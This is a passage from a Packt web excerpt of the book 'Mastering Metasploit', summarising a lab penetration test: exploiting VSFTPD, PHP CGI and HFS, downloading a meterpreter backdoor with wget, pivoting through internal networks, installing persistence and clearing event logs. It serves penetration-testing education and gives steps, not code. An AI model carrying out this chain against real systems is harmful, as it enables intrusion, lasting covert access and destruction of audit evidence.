Search icon CANCEL
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Conferences
Free Learning
Arrow right icon
Arrow up icon
GO TO TOP
Mastering Metasploit

You're reading from   Mastering Metasploit Discover the next level of network defense with the Metasploit framework

Arrow left icon
Product type Paperback
Published in Sep 2016
Publisher Packt
ISBN-13 9781786463166
Length 440 pages
Edition 2nd Edition
Arrow right icon
Author (1):
Arrow left icon
Nipun Jaswal Nipun Jaswal
Author Profile Icon Nipun Jaswal
Nipun Jaswal
Arrow right icon
View More author details
Toc

Table of Contents (11) Chapters Close

Preface 1. Approaching a Penetration Test Using Metasploit FREE CHAPTER 2. Reinventing Metasploit 3. The Exploit Formulation Process 4. Porting Exploits 5. Testing Services with Metasploit 6. Virtual Test Grounds and Staging 7. Client-side Exploitation 8. Metasploit Extended 9. Speeding up Penetration Testing 10. Visualizing with Armitage

Revising the approach

Let us summarize the entire penetration test step by step:

  1. In the very first step, we did an NMAP scan over the target.
  2. We found that VSFTPD 2.3.4 is running on port 21 and is vulnerable to attack.
  3. We exploited VSFTPD 2.3.5 running on port 21.
  4. We got the shell access to the target running at 192.168.10.112.

    Revising the approach

  5. We created a Linux meterpreter shell and copied it to the /var/www directory of Apache. Next, we ran the wget command from the shell and downloaded our newly created meterpreter shell onto the target.
  6. We assigned full privileges to the shell backdoor file via chmod 777 backdoor.elf.
  7. Setting up an exploit handler in a separate window, which is listening on port 4444, we ran the backdoor.elf file on the target.
  8. We got the Linux meterpreter access on the target system, which is 192.168.10.112.
  9. Running the arp command on the compromised system, we found that it was internally connected to a separate network and is connected to another system running on an internal IP address, 192.168.20.4.

    Revising the approach

  10. We quickly set up an autoroute to the 192.168.20.0/24 network via our meterpreter shell on 192.168.10.112.
  11. Pivoting all the traffic through our meterpreter, we performed a TCP port scan on the target and service identification modules.
  12. We found that target was running vulnerable version of PHP on port 80.
  13. We exploited the system with PHP CGI Argument Injection Vulnerability.
  14. We gained PHP meterpreter access to the internal system of the network running at 192.168.20.4.
  15. We performed similar steps as done previously on the first system, by uploading and executing the backdoor.elf file.
  16. We got Linux meterpreter access to the target.
  17. We ran the arp command to find if there were any other hosts present on the network.
  18. We figured out that there was one more system running on IP address 192.168.20.6 and we performed a TCP port scan.

    Revising the approach

  19. Scanning all the ports, we figured out that HFS 2.3 was running on port 8080 and was vulnerable to the Remote Command Execution vulnerability.
  20. We exploited the system with the HFS exploit module with Metasploit.
  21. We got the Windows meterpreter access to the target.
  22. We ran a persistence module to maintain access to the target.
  23. The persistence module will try to establish a connection to our system after every few seconds and will open meterpreter access as soon as a handler is up.
  24. We cleared the logs via the event_manager module from meterpreter.
You have been reading a chapter from
Mastering Metasploit - Second Edition
Published in: Sep 2016
Publisher: Packt
ISBN-13: 9781786463166
Register for a free Packt account to unlock a world of extra content!
A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.
Unlock this book and the full library FREE for 7 days
Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of
Renews at AU $24.99/month. Cancel anytime